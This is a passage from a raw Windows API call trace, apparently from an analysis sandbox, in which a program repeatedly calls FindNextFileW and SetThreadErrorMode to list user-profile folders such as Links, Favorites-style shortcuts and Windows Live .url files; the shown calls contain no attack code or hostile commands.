lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.189] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.192] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.192] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.192] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0250.192] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0250.192] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0250.192] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0250.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.194] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.194] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.194] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0250.194] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0250.194] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0250.194] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.200] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.200] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.200] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0250.200] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0250.201] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0250.201] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0250.201] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.202] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.202] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.202] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0250.202] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0250.202] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0250.202] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0250.202] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0250.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.205] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.205] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0250.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0250.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0250.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0250.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0250.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0250.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0250.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0250.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0250.208] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.212] SetThreadErrorMode 